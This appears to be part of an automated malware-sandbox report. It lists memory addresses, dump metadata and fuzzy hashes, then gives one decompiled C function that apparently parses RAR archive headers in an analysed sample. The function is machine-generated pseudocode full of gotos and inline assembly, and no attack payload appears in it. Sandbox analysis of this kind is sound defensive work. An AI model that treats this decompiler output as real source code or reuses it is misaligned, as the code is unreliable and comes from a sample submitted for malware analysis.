                0x003d3767
                0x003d3776
                0x003d3780
                0x003d3782
                0x003d3782
                0x003d3784
                0x003d3784
                0x003d378a
                0x00000000
                0x003d378a
                0x003d3709
                0x003d370a
                0x003d36c1
                0x003d36c4
                0x003d36c6
                0x003d36c7
                0x003d36d9
                0x00000000
                0x003d36d9
                0x003d36bb
                0x003d36bc
                0x00000000
                0x003d36bc
                0x003d3660
                0x003d3663
                0x003d366b
                0x003d3678
                0x003d3684
                0x003d368c
                0x003d3693
                0x003d3693
                0x00000000
                0x003d3663
                0x003d3643
                0x003d35c1
                0x003d35c3
                0x003d35c6
                0x003d35c8
                0x003d35cb
                0x003d35cd
                0x00000000
                0x00000000
                0x003d35cf
                0x00000000
                0x00000000
                0x003d35d5
                0x003d35db
                0x00000000
                0x00000000
                0x00000000
                0x003d35db
                0x003d3579
                0x003d3585
                0x003d358c
                0x003d3591
                0x003d3595
                0x00000000
                0x003d3597
                0x003d359e
                0x003d3375
                0x003d3375
                0x00000000
                0x003d3375
                0x003d3595
                0x003d34b8
                0x003d34ba
                0x00000000
                0x003d34ba
                0x003d3339
                0x003d333c
                0x003d333e
                0x003d3344
                0x00000000
                0x003d3358
                0x003d3358
                0x003d335e
                0x003d3362
                0x003d3368
                0x003d338e
                0x003d3396
                0x003d3398
                0x003d339b
                0x00000000
                0x00000000
                0x003d33a1
                0x003d33a7
                0x003d33ae
                0x003d33bd
                0x003d33bd
                0x003d33c1
                0x003d33c3
                0x003d33df
                0x003d33eb
                0x003d33f7
                0x003d33fc
                0x003d3403
                0x003d3482
                0x003d3482
                0x00000000
                0x003d3405
                0x003d3405
                0x003d340b
                0x003d3412
                0x003d3417
                0x003d341a
                0x003d341c
                0x00000000
                0x00000000
                0x003d341e
                0x003d3422
                0x003d3425
                0x003d3426
                0x003d3427
                0x003d3487
                0x003d3489
                0x003d3495
                0x003d349c
                0x00000000
                0x003d349c
                0x003d3429
                0x003d342e
                0x003d343f
                0x003d3446
                0x003d346e
                0x003d3473
                0x003d347a
                0x003d3480
                0x00000000
                0x00000000
                0x00000000
                0x003d3480
                0x00000000
                0x003d340b
                0x003d3403
                0x003d33b0
                0x003d33b5
                0x003d33b9
                0x003d33bb
                0x00000000
                0x00000000
                0x00000000
                0x003d336a
                0x003d3370
                0x00000000
                0x003d3370
                0x003d3368

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog_swprintf
                • String ID: CMT$h%u$hc%u
                • API String ID: 146138363-3282847064
                • Opcode ID: 418d16340742ffb935fa1c737f8cca53321859d20eb34bab671ebf42ad4ac0af
                • Instruction ID: ba62e10e84d859aaf525dfafba93a9beb1f1f36f05a8edbb9fc11569a57c9f9e
                • Opcode Fuzzy Hash: 418d16340742ffb935fa1c737f8cca53321859d20eb34bab671ebf42ad4ac0af
                • Instruction Fuzzy Hash: 273203725242859FDB16DF74D895AEA3BA5AF15300F04047FFD8A8F382DB709A49CB21
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 87%
                			E003D286B(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t329;
				signed int _t334;
				void* _t335;
				void* _t337;
				signed int _t340;
				char _t354;
				signed short _t361;
				signed int _t364;
				signed int _t371;
				signed char _t374;
				signed char _t377;
				signed int _t378;
				signed int _t395;
				signed int _t396;
				signed int _t400;
				signed char _t413;
				intOrPtr _t414;
				char _t415;
				signed int _t418;
				signed int _t419;
				signed int _t424;
				signed int _t427;
				signed int _t432;
				signed short _t437;
				signed short _t442;
				unsigned int _t447;
				signed int _t450;
				signed int _t455;
				signed int _t469;
				void* _t470;
				void* _t478;
				signed char _t484;
				signed int _t488;
				signed int _t498;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				intOrPtr* _t516;
				signed int _t520;
				signed int _t521;
				signed int _t533;
				signed int _t537;
				signed int _t539;
				unsigned int _t548;
				signed int _t550;
				signed int _t560;
				signed int _t562;
				signed int _t563;
				intOrPtr* _t585;
				void* _t593;
				signed int _t597;
				intOrPtr _t609;
				signed int _t612;
				signed int _t624;
				signed char _t628;
				void* _t639;
				signed char _t640;
				signed int _t643;
				unsigned int _t644;
				signed int _t647;
				signed int _t648;
				signed int _t650;
				signed int _t651;
				unsigned int _t653;
				signed int _t657;
				void* _t659;
				void* _t665;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed int _t672;
				void* _t673;
				signed int _t675;
				intOrPtr* _t676;
				signed int _t688;
				void* _t694;
				signed int _t695;
				signed int _t697;
				signed int _t699;
				signed int _t701;
				intOrPtr _t707;
				intOrPtr* _t708;
				intOrPtr _t718;

				E003EEB78(0x4026a5, _t708);
				E003EEC50(0x2024);
				_t516 = __ecx;
				 *((intOrPtr*)(_t708 + 0x14)) = __ecx;
				E003DCB83(_t708 + 0x1c, __ecx);
				 *(_t708 + 0x10) = 0;
				 *((intOrPtr*)(_t708 - 4)) = 0;
				_t657 = 7;
				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
					L7:
					 *((char*)(_t708 + 0x5a)) = 0;
					L8:
					_push(_t657);
					E003DCD8A();
					__eflags =  *(_t708 + 0x34);
					if( *(_t708 + 0x34) == 0) {
						L5:
						E003D3FFC(_t516, _t639);
						L131:
						E003D15FB(_t708 + 0x1c);
						 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
						return  *(_t708 + 0x10);
					}
					 *(_t516 + 0x21fc) = E003DCBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x220c) = 0;
					_t688 = E003DCBAF(_t708 + 0x1c) & 0x000000ff;
					_t329 = E003DCBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x2204) = _t329;
					 *(_t516 + 0x220c) = _t329 >> 0x0000000e & 0x00000001;
					_t533 = E003DCBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x2208) = _t533;
					 *(_t516 + 0x2200) = _t688;
					__eflags = _t533 - _t657;
					if(_t533 >= _t657) {
						_t640 = 2;
						_t334 = _t688 - 0x73;
						__eflags = _t334;
						if(_t334 == 0) {
							 *(_t516 + 0x2200) = 1;
							_t688 = 1;
							__eflags = 1;
							L20:
							 *(_t516 + 0x21f4) = _t688;
							__eflags = _t688 - 0x75;
							if(_t688 == 0x75) {
								L23:
								_t335 = 6;
								L25:
								_push(_t335);
								E003DCD8A();
								_t337 = E003D1983(_t516,  *(_t516 + 0x2208));
								asm("adc ecx, 0x0");
								 *((intOrPtr*)(_t516 + 0x6cc0)) = _t337 +  *((intOrPtr*)(_t516 + 0x6cb8));
								 *(_t516 + 0x6cc4) =  *(_t516 + 0x6cbc);
								_t537 =  *(_t516 + 0x2200);
								 *(_t708 + 0x18) = _t537;
								_t340 = _t537 - 1;
								__eflags = _t340;
								if(_t340 == 0) {
									_t659 = _t516 + 0x2220;
									E003DAD5E(_t659);
									_t539 = 5;
									memcpy(_t659, _t516 + 0x21fc, _t539 << 2);
									 *(_t516 + 0x2234) = E003DCBC6(_t708 + 0x1c);
									_t640 = E003DCBFB(_t708 + 0x1c);
									 *(_t516 + 0x2238) = _t640;
									 *(_t516 + 0x6ccd) =  *(_t516 + 0x2228) & 0x00000001;
									 *(_t516 + 0x6ccc) =  *(_t516 + 0x2228) >> 0x00000003 & 0x00000001;
									_t548 =  *(_t516 + 0x2228);
									 *(_t516 + 0x6ccf) = _t548 >> 0x00000002 & 0x00000001;
									 *(_t516 + 0x6cd3) = _t548 >> 0x00000006 & 0x00000001;
									 *(_t516 + 0x6cd4) = _t548 >> 0x00000007 & 0x00000001;
									__eflags = _t640;
									if(_t640 != 0) {
										L117:
										_t354 = 1;
										L118:
										 *((char*)(_t516 + 0x6cd0)) = _t354;
										 *(_t516 + 0x223c) = _t548 >> 0x00000001 & 0x00000001;
										_t550 = _t548 >> 0x00000004 & 0x00000001;
										__eflags = _t550;
										 *(_t516 + 0x6cd1) = _t548 >> 0x00000008 & 0x00000001;
										 *(_t516 + 0x6cd2) = _t550;
										L119:
										_t657 = 7;
										L120:
										_t361 = E003DCCAC(_t708 + 0x1c, 0);
										__eflags =  *(_t516 + 0x21fc) - (_t361 & 0x0000ffff);
										if( *(_t516 + 0x21fc) == (_t361 & 0x0000ffff)) {
											L130:
											 *(_t708 + 0x10) =  *(_t708 + 0x34);
											goto L131;
										}
										_t364 =  *(_t516 + 0x2200);
										__eflags = _t364 - 0x79;
										if(_t364 == 0x79) {
											goto L130;
										}
										__eflags = _t364 - 0x76;
										if(_t364 == 0x76) {
											goto L130;
										}
										__eflags = _t364 - 5;
										if(_t364 != 5) {
											L128:
											 *((char*)(_t516 + 0x6cdc)) = 1;
											E003D6D83(0x411098, 3);
											__eflags =  *((char*)(_t708 + 0x5a));
											if(__eflags == 0) {
												goto L130;
											}
											E003D2021(__eflags, 4, _t516 + 0x32, _t516 + 0x32);
											 *((char*)(_t516 + 0x6cdd)) = 1;
											goto L131;
										}
										__eflags =  *(_t516 + 0x45c6);
										if( *(_t516 + 0x45c6) == 0) {
											goto L128;
										}
										 *0x403278();
										_t371 =  *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0x14))))() - _t657;
										__eflags = _t371;
										asm("sbb edx, ecx");
										 *0x403278(_t371, _t640, 0);
										 *((intOrPtr*)( *_t516 + 0x10))();
										 *(_t708 + 0x5b) = 1;
										do {
											_t374 = E003D9892(_t516);
											asm("sbb al, al");
											_t377 =  !( ~_t374) &  *(_t708 + 0x5b);
											 *(_t708 + 0x5b) = _t377;
											_t657 = _t657 - 1;
											__eflags = _t657;
										} while (_t657 != 0);
										__eflags = _t377;
										if(_t377 != 0) {
											goto L130;
										}
										goto L128;
									}
									_t354 = 0;
									__eflags =  *(_t516 + 0x2234);
									if( *(_t516 + 0x2234) == 0) {
										goto L118;
									}
									goto L117;
								}
								_t378 = _t340 - 1;
								__eflags = _t378;
								if(_t378 == 0) {
									L35:
									__eflags = _t537 - 2;
									_t68 = (0 | _t537 == 0x00000002) - 1; // -1
									_t665 = (_t68 & 0x00002350) + 0x2298 + _t516;
									 *(_t708 + 0x4c) = _t665;
									E003DACC4(_t665, 0);
									_t560 = 5;
									memcpy(_t665, _t516 + 0x21fc, _t560 << 2);
									_t694 =  *(_t708 + 0x4c);
									_t668 =  *(_t708 + 0x18);
									_t562 =  *(_t694 + 8);
									 *(_t694 + 0x1098) =  *(_t694 + 8) & 1;
									 *(_t694 + 0x1099) = _t562 >> 0x00000001 & 1;
									 *(_t694 + 0x109b) = _t562 >> 0x00000002 & 1;
									 *(_t694 + 0x10a0) = _t562 >> 0x0000000a & 1;
									_t395 = _t562 & 0x00000010;
									__eflags = _t668 - 2;
									if(_t668 != 2) {
										L38:
										_t643 = 0;
										__eflags = 0;
										 *(_t708 + 0x5b) = 0;
										L39:
										 *((char*)(_t694 + 0x10f0)) =  *(_t708 + 0x5b);
										_t516 =  *((intOrPtr*)(_t708 + 0x14));
										__eflags = _t668 - 2;
										if(_t668 == 2) {
											L41:
											_t396 = _t643;
											L42:
											 *(_t694 + 0x10fa) = _t396;
											_t563 = _t562 & 0x000000e0;
											__eflags = _t563 - 0xe0;
											 *((char*)(_t694 + 0x10f1)) = 0 | _t563 == 0x000000e0;
											__eflags = _t563 - 0xe0;
											if(_t563 != 0xe0) {
												_t644 =  *(_t694 + 8);
												_t400 = 0x10000 << (_t644 >> 0x00000005 & 0x00000007);
												__eflags = 0x10000;
											} else {
												_t400 = _t643;
												_t644 =  *(_t694 + 8);
											}
											 *(_t694 + 0x10f4) = _t400;
											 *(_t694 + 0x10f3) = _t644 >> 0x0000000b & 0x00000001;
											 *(_t694 + 0x10f2) = _t644 >> 0x00000003 & 0x00000001;
											 *((intOrPtr*)(_t694 + 0x14)) = E003DCBFB(_t708 + 0x1c);
											 *((intOrPtr*)(_t708 + 0x54)) = E003DCBFB(_t708 + 0x1c);
											 *((char*)(_t694 + 0x18)) = E003DCBAF(_t708 + 0x1c);
											 *(_t694 + 0x1070) = 2;
											 *((intOrPtr*)(_t694 + 0x1074)) = E003DCBFB(_t708 + 0x1c);
											 *(_t708 + 0x44) = E003DCBFB(_t708 + 0x1c);
											 *(_t694 + 0x1c) = E003DCBAF(_t708 + 0x1c) & 0x000000ff;
											 *((char*)(_t694 + 0x20)) = E003DCBAF(_t708 + 0x1c) - 0x30;
											 *(_t708 + 0x50) = E003DCBC6(_t708 + 0x1c) & 0x0000ffff;
											_t413 = E003DCBFB(_t708 + 0x1c);
											_t647 =  *(_t694 + 0x1c);
											 *(_t708 + 0x48) = _t413;
											 *(_t694 + 0x24) = _t413;
											__eflags = _t647 - 0x14;
											if(_t647 < 0x14) {
												__eflags = _t413 & 0x00000010;
												if((_t413 & 0x00000010) != 0) {
													 *((char*)(_t694 + 0x10f1)) = 1;
												}
											}
											 *(_t694 + 0x109c) = 0;
											__eflags =  *(_t694 + 0x109b);
											if( *(_t694 + 0x109b) == 0) {
												L57:
												_t414 =  *((intOrPtr*)(_t694 + 0x18));
												 *(_t694 + 0x10fc) = 2;
												__eflags = _t414 - 3;
												if(_t414 == 3) {
													L61:
													 *(_t694 + 0x10fc) = 1;
													L62:
													 *(_t694 + 0x1100) = 0;
													__eflags = _t414 - 3;
													if(_t414 == 3) {
														__eflags = ( *(_t708 + 0x48) & 0x0000f000) - 0xa000;
														if(( *(_t708 + 0x48) & 0x0000f000) == 0xa000) {
															__eflags = 0;
															 *(_t694 + 0x1100) = 1;
															 *((short*)(_t694 + 0x1104)) = 0;
														}
													}
													__eflags = _t668 - 2;
													if(_t668 == 2) {
														L67:
														_t415 = 0;
														goto L68;
													} else {
														_t415 = 1;
														__eflags =  *(_t694 + 0x24);
														if( *(_t694 + 0x24) < 0) {
															L68:
															 *((char*)(_t694 + 0x10f8)) = _t415;
															_t418 =  *(_t694 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t418;
															 *(_t694 + 0x10f9) = _t418;
															if(_t418 == 0) {
																__eflags =  *((intOrPtr*)(_t708 + 0x54)) - 0xffffffff;
																_t640 = 0;
																_t669 = 0;
																_t141 =  *((intOrPtr*)(_t708 + 0x54)) == 0xffffffff;
																__eflags = _t141;
																_t419 = _t418 & 0xffffff00 | _t141;
																L74:
																 *(_t694 + 0x109a) = _t419;
																 *(_t708 + 0x5b) = _t419;
																 *((intOrPtr*)(_t694 + 0x1058)) = 0 +  *((intOrPtr*)(_t694 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t694 + 0x105c)) = _t669;
																asm("adc edx, ecx");
																 *(_t694 + 0x1060) = 0 +  *((intOrPtr*)(_t708 + 0x54));
																__eflags =  *(_t708 + 0x5b);
																 *(_t694 + 0x1064) = _t640;
																if( *(_t708 + 0x5b) != 0) {
																	 *(_t694 + 0x1060) = 0x7fffffff;
																	 *(_t694 + 0x1064) = 0x7fffffff;
																}
																_t424 =  *(_t708 + 0x50);
																_t670 = 0x1fff;
																__eflags = _t424 - 0x1fff;
																if(_t424 < 0x1fff) {
																	_t670 = _t424;
																}
																E003DCC5D(_t708 + 0x1c, _t708 - 0x2030, _t670);
																_t427 = 0;
																__eflags =  *(_t708 + 0x18) - 2;
																 *((char*)(_t708 + _t670 - 0x2030)) = 0;
																_t585 = ((0 |  *(_t708 + 0x18) == 0x00000002) - 0x00000001 & 0x00002350) + 0x22c0 + _t516;
																__eflags =  *(_t708 + 0x18) - 2;
																 *((intOrPtr*)(_t708 + 0x54)) = _t585;
																if( *(_t708 + 0x18) != 2) {
																	E003E1B84(_t708 - 0x2030, _t585, 0x800);
																	_t431 =  *((intOrPtr*)(_t694 + 0xc)) -  *(_t708 + 0x50);
																	__eflags =  *(_t694 + 8) & 0x00000400;
																	_t671 = _t431 - 0x20;
																	if(( *(_t694 + 8) & 0x00000400) != 0) {
																		_t671 = _t431 - 0x28;
																	}
																	__eflags = _t671;
																	if(_t671 > 0) {
																		E003D20BD(_t694 + 0x1028, _t671);
																		_t676 = _t694 + 0x1028;
																		_t431 = E003F3E49(E003DCC5D(_t708 + 0x1c,  *_t676, _t671),  *((intOrPtr*)(_t708 + 0x54)), L"RR");
																		__eflags = _t431;
																		if(_t431 == 0) {
																			__eflags =  *((intOrPtr*)(_t694 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t694 + 0x102c)) >= 0x14) {
																				_t609 =  *_t676;
																				_t184 = _t609 + 0xb; // 0x7500
																				asm("cdq");
																				_t695 =  *_t184 & 0x000000ff;
																				_t185 = _t609 + 0xa; // 0x750025
																				asm("cdq");
																				_t697 = (_t695 << 8) + ( *_t185 & 0x000000ff);
																				_t190 = _t609 + 9; // 0x75002500
																				asm("adc edi, edx");
																				asm("cdq");
																				_t699 = (_t697 << 8) + ( *_t190 & 0x000000ff);
																				_t195 = _t609 + 8; // 0x250068
																				asm("adc edi, edx");
																				asm("cdq");
																				_t701 = (_t699 << 8) + ( *_t195 & 0x000000ff);
																				asm("adc edi, edx");
																				 *(_t516 + 0x21d8) = _t701 << 9;
																				 *(_t516 + 0x21dc) = ((((_t640 << 0x00000020 | _t695) << 0x8 << 0x00000020 | _t697) << 0x8 << 0x00000020 | _t699) << 0x8 << 0x00000020 | _t701) << 9;
																				 *0x403278();
																				_t469 = E003E0264( *(_t516 + 0x21d8),  *(_t516 + 0x21dc),  *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0x14))))(), _t640);
																				 *(_t516 + 0x21e0) = _t469;
																				 *(_t708 + 0x48) = _t469;
																				_t470 = E003EEBA0(_t468, _t640, 0xc8, 0);
																				asm("adc edx, [ebx+0x21dc]");
																				_t431 = E003E0264(_t470 +  *(_t516 + 0x21d8), _t640, _t468, _t640);
																				_t612 =  *(_t708 + 0x48);
																				_t694 =  *(_t708 + 0x4c);
																				__eflags = _t431 - _t612;
																				if(_t431 > _t612) {
																					_t431 = _t612 + 1;
																					 *(_t516 + 0x21e0) = _t612 + 1;
																				}
																			}
																		}
																	}
																	_t432 = E003F3E49(_t431,  *((intOrPtr*)(_t708 + 0x54)), L"CMT");
																	__eflags = _t432;
																	if(_t432 == 0) {
																		 *((char*)(_t516 + 0x6cce)) = 1;
																	}
																} else {
																	_t640 = 0;
																	 *_t585 = 0;
																	__eflags =  *(_t694 + 8) & 0x00000200;
																	if(( *(_t694 + 8) & 0x00000200) != 0) {
																		E003D6976(_t708);
																		_t478 = E003F3E90(_t708 - 0x2030) + 1;
																		__eflags = _t670 - _t478;
																		if(_t670 > _t478) {
																			__eflags = _t478 + _t708 - 0x2030;
																			E003D6986(_t708, _t708 - 0x2030, _t670, _t478 + _t708 - 0x2030, _t670 - _t478,  *((intOrPtr*)(_t708 + 0x54)), 0x800);
																		}
																		_t585 =  *((intOrPtr*)(_t708 + 0x54));
																		_t427 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t585 - _t427;
																	if( *_t585 == _t427) {
																		_push(1);
																		_push(0x800);
																		_push(_t585);
																		_push(_t708 - 0x2030);
																		E003E02BA();
																	}
																	E003D2134(_t516, _t694);
																}
																__eflags =  *(_t694 + 8) & 0x00000400;
																if(( *(_t694 + 8) & 0x00000400) != 0) {
																	E003DCC5D(_t708 + 0x1c, _t694 + 0x10a1, 8);
																}
																E003E140E( *(_t708 + 0x44));
																__eflags =  *(_t694 + 8) & 0x00001000;
																if(( *(_t694 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t516 + 0x6cc0)) = E003D3EFB( *((intOrPtr*)(_t516 + 0x6cc0)),  *(_t516 + 0x6cc4),  *((intOrPtr*)(_t694 + 0x1058)),  *((intOrPtr*)(_t694 + 0x105c)), 0, 0);
																	 *(_t516 + 0x6cc4) = _t640;
																	 *(_t708 + 0x44) =  *(_t694 + 0x10f2);
																	_t437 = E003DCCAC(_t708 + 0x1c,  *(_t708 + 0x44));
																	__eflags =  *_t694 - (_t437 & 0x0000ffff);
																	if( *_t694 != (_t437 & 0x0000ffff)) {
																		 *((char*)(_t516 + 0x6cdc)) = 1;
																		E003D6D83(0x411098, 1);
																		__eflags =  *((char*)(_t708 + 0x5a));
																		if(__eflags == 0) {
																			E003D2021(__eflags, 0x1c, _t516 + 0x32,  *((intOrPtr*)(_t708 + 0x54)));
																		}
																	}
																	goto L119;
																} else {
																	_t442 = E003DCBC6(_t708 + 0x1c);
																	 *_t708 = _t516 + 0x32d8;
																	 *((intOrPtr*)(_t708 + 4)) = _t516 + 0x32e0;
																	 *((intOrPtr*)(_t708 + 8)) = _t516 + 0x32e8;
																	__eflags = 0;
																	_t672 = 0;
																	 *((intOrPtr*)(_t708 + 0xc)) = 0;
																	_t447 = _t442 & 0x0000ffff;
																	 *(_t708 + 0x50) = 0;
																	 *(_t708 + 0x44) = _t447;
																	do {
																		_t593 = 3;
																		_t520 = _t447 >> _t593 - _t672 << 2;
																		__eflags = _t520 & 0x00000008;
																		if((_t520 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t708 + _t672 * 4);
																		if( *(_t708 + _t672 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t672;
																		if(__eflags != 0) {
																			E003E140E(E003DCBFB(_t708 + 0x1c));
																		}
																		E003E1218( *(_t708 + _t672 * 4), _t640, _t708, __eflags, _t708 - 0x30);
																		__eflags = _t520 & 0x00000004;
																		if((_t520 & 0x00000004) != 0) {
																			_t249 = _t708 - 0x1c;
																			 *_t249 =  *(_t708 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t597 = 0;
																		 *(_t708 - 0x18) = 0;
																		_t521 = _t520 & 0x00000003;
																		__eflags = _t521;
																		if(_t521 <= 0) {
																			L109:
																			_t450 = _t597 * 0x64;
																			__eflags = _t450;
																			 *(_t708 - 0x18) = _t450;
																			E003E146A( *(_t708 + _t672 * 4), _t640, _t708 - 0x30);
																			_t447 =  *(_t708 + 0x44);
																		} else {
																			_t673 = 3;
																			_t675 = _t673 - _t521 << 3;
																			__eflags = _t675;
																			do {
																				_t455 = (E003DCBAF(_t708 + 0x1c) & 0x000000ff) << _t675;
																				_t675 = _t675 + 8;
																				_t597 =  *(_t708 - 0x18) | _t455;
																				 *(_t708 - 0x18) = _t597;
																				_t521 = _t521 - 1;
																				__eflags = _t521;
																			} while (_t521 != 0);
																			_t672 =  *(_t708 + 0x50);
																			goto L109;
																		}
																		L110:
																		_t672 = _t672 + 1;
																		 *(_t708 + 0x50) = _t672;
																		__eflags = _t672 - 4;
																	} while (_t672 < 4);
																	_t516 =  *((intOrPtr*)(_t708 + 0x14));
																	goto L112;
																}
															}
															_t669 = E003DCBFB(_t708 + 0x1c);
															_t484 = E003DCBFB(_t708 + 0x1c);
															__eflags =  *((intOrPtr*)(_t708 + 0x54)) - 0xffffffff;
															_t640 = _t484;
															if( *((intOrPtr*)(_t708 + 0x54)) != 0xffffffff) {
																L72:
																_t419 = 0;
																goto L74;
															}
															__eflags = _t640 - 0xffffffff;
															if(_t640 != 0xffffffff) {
																goto L72;
															}
															_t419 = 1;
															goto L74;
														}
														goto L67;
													}
												}
												__eflags = _t414 - 5;
												if(_t414 == 5) {
													goto L61;
												}
												__eflags = _t414 - 6;
												if(_t414 < 6) {
													 *(_t694 + 0x10fc) = 0;
												}
												goto L62;
											} else {
												_t648 = _t647 - 0xd;
												__eflags = _t648;
												if(_t648 == 0) {
													 *(_t694 + 0x109c) = 1;
													goto L57;
												}
												_t650 = _t648;
												__eflags = _t650;
												if(_t650 == 0) {
													 *(_t694 + 0x109c) = 2;
													goto L57;
												}
												_t651 = _t650 - 5;
												__eflags = _t651;
												if(_t651 == 0) {
													L54:
													 *(_t694 + 0x109c) = 3;
													goto L57;
												}
												__eflags = _t651 == 6;
												if(_t651 == 6) {
													goto L54;
												}
												 *(_t694 + 0x109c) = 4;
												goto L57;
											}
										}
										__eflags = _t395;
										_t396 = 1;
										if(_t395 != 0) {
											goto L42;
										}
										goto L41;
									}
									__eflags = _t395;
									if(_t395 == 0) {
										goto L38;
									}
									 *(_t708 + 0x5b) = 1;
									_t643 = 0;
									goto L39;
								}
								_t488 = _t378 - 1;
								__eflags = _t488;
								if(_t488 == 0) {
									goto L35;
								}
								__eflags = _t488 == 0;
								if(_t488 == 0) {
									_t624 = 5;
									memcpy(_t516 + 0x45a8, _t516 + 0x21fc, _t624 << 2);
									_t653 =  *(_t516 + 0x45b0);
									 *(_t516 + 0x45c4) =  *(_t516 + 0x45b0) & 0x00000001;
									_t628 = _t653 >> 0x00000001 & 0x00000001;
									_t640 = _t653 >> 0x00000003 & 0x00000001;
									 *(_t516 + 0x45c5) = _t628;
									 *(_t516 + 0x45c6) = _t653 >> 0x00000002 & 0x00000001;
									 *(_t516 + 0x45c7) = _t640;
									__eflags = _t628;
									if(_t628 != 0) {
										 *((intOrPtr*)(_t516 + 0x45bc)) = E003DCBFB(_t708 + 0x1c);
									}
									__eflags =  *(_t516 + 0x45c7);
									if( *(_t516 + 0x45c7) != 0) {
										_t498 = E003DCBC6(_t708 + 0x1c) & 0x0000ffff;
										 *(_t516 + 0x45c0) = _t498;
										 *(_t516 + 0x6cf0) = _t498;
									}
									goto L119;
								} else {
									__eflags =  *(_t516 + 0x2204) & 0x00008000;
									if(( *(_t516 + 0x2204) & 0x00008000) != 0) {
										 *((intOrPtr*)(_t516 + 0x6cc0)) =  *((intOrPtr*)(_t516 + 0x6cc0)) + E003DCBFB(_t708 + 0x1c);
										asm("adc dword [ebx+0x6cc4], 0x0");
									}
									goto L120;
								}
							}
							__eflags = _t688 - 1;
							if(_t688 != 1) {
								L24:
								_t335 = _t533 - 7;
								goto L25;
							}
							__eflags =  *(_t516 + 0x2204) & 0x00000002;
							if(( *(_t516 + 0x2204) & 0x00000002) == 0) {
								goto L24;
							}
							goto L23;
						}
						_t501 = _t334 - 1;
						__eflags = _t501;
						if(_t501 == 0) {
							 *(_t516 + 0x2200) = _t640;
							_t688 = _t640;
							goto L20;
						}
						_t502 = _t501 - 6;
						__eflags = _t502;
						if(_t502 == 0) {
							_push(3);
							L17:
							_pop(_t503);
							 *(_t516 + 0x2200) = _t503;
							_t688 = _t503;
							goto L20;
						}
						__eflags = _t502 != 1;
						if(_t502 != 1) {
							goto L20;
						} else {
							_push(5);
							goto L17;
						}
					} else {
						E003D20D7(_t516);
						goto L131;
					}
				}
				_t639 =  *((intOrPtr*)(__ecx + 0x6cd8)) + _t657;
				asm("adc eax, ecx");
				_t718 =  *((intOrPtr*)(__ecx + 0x6cbc));
				if(_t718 < 0 || _t718 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t639) {
					goto L7;
				} else {
					 *((char*)(_t708 + 0x5a)) = 1;
					E003D3E6D(_t516);
					 *0x403278(_t708 + 0x40, 8);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0xc))))() == 8) {
						_t707 = _t516 + 0x1038;
						E003D603A(_t707, 0, 4,  *((intOrPtr*)(_t516 + 0x21d4)) + 0x6024, _t708 + 0x40, 0, 0, 0, 0);
						 *((intOrPtr*)(_t708 + 0x3c)) = _t707;
						goto L8;
					}
					goto L5;
				}
			}
























































































                0x003d2874
                0x003d287e
                0x003d2885
                0x003d288c
                0x003d288f
                0x003d2898
                0x003d289b
                0x003d289e
                0x003d28a5
                0x003d2923
                0x003d2923
                0x003d2926
                0x003d2926
                0x003d292a
                0x003d292f
                0x003d2933
                0x003d28ec
                0x003d28ee
                0x003d32da
                0x003d32dd
                0x003d32eb
                0x003d32f6
                0x003d32f6
                0x003d2943
                0x003d2949
                0x003d2958
                0x003d2960
                0x003d2966
                0x003d2971
                0x003d297c
                0x003d297f
                0x003d2985
                0x003d298b
                0x003d298d
                0x003d299f
                0x003d29a0
                0x003d29a0
                0x003d29a3
                0x003d29d1
                0x003d29db
                0x003d29db
                0x003d29dc
                0x003d29dc
                0x003d29e2
                0x003d29e5
                0x003d29f5
                0x003d29f7
                0x003d29fd
                0x003d29fd
                0x003d2a01
                0x003d2a0e
                0x003d2a1f
                0x003d2a22
                0x003d2a28
                0x003d2a2e
                0x003d2a36
                0x003d2a39
                0x003d2a39
                0x003d2a3c
                0x003d3159
                0x003d3161
                0x003d3168
                0x003d316f
                0x003d317c
                0x003d318e
                0x003d3193
                0x003d3199
                0x003d31ab
                0x003d31b1
                0x003d31be
                0x003d31cb
                0x003d31d8
                0x003d31de
                0x003d31e0
                0x003d31ed
                0x003d31ed
                0x003d31ef
                0x003d31ef
                0x003d31fb
                0x003d320b
                0x003d320b
                0x003d320e
                0x003d3214
                0x003d321a
                0x003d321c
                0x003d321d
                0x003d3222
                0x003d322a
                0x003d3230
                0x003d32d4
                0x003d32d7
                0x00000000
                0x003d32d7
                0x003d3236
                0x003d323c
                0x003d323f
                0x00000000
                0x00000000
                0x003d3245
                0x003d3248
                0x00000000
                0x00000000
                0x003d324e
